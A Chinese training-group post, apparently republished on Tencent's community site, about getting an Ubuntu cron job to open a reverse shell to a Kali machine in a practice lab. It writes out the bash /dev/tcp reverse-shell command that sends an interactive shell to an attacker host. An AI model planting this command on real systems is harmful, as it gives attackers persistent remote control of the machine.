黑客网络攻击实例:Ubuntu CRON自动定时任务反弹shell到Kali系统

背景介绍

今天下午,我们学员针对Ubuntu系统练习反弹shell攻击的时候,遇到了个问题:当他在Ubuntu中使用Cron添加自动任务,任务指令为

bash -i >& /dev/tcp/(kali系统ip)/8888 0>&1

但是系统每次自动执行反弹shell指令的时候,都是失败

,而且系统日志中也会报错

(CRON) info (No MTA installed, discarding output),

百度了也不知道因为啥。

于是针对这个问题,我们经过分析,排错,最终找出问题,成功使Ubuntu系统自动执行反弹shell任务,Kali成功获得Ubuntu的shell,为了给学员讲清楚,同时也给其他学员分享这个过程,我们在赛克尖刀连的qq群临时开了直播,并应大家要求,做了视频录制,在这也拿出来给赛克头条的粉丝们一起分享,希望能够对大家有所帮助(特此提醒:主播很业余,声音没有磁性,但问题可以描述清楚,希望大家本着宽容的心态来收看!) ^_^)Y

过一段时间会将具体的文章在社区内发布,大家可以公众号上的最新文章菜单,随时获取最新的技术文章

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180817G1X64Z00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券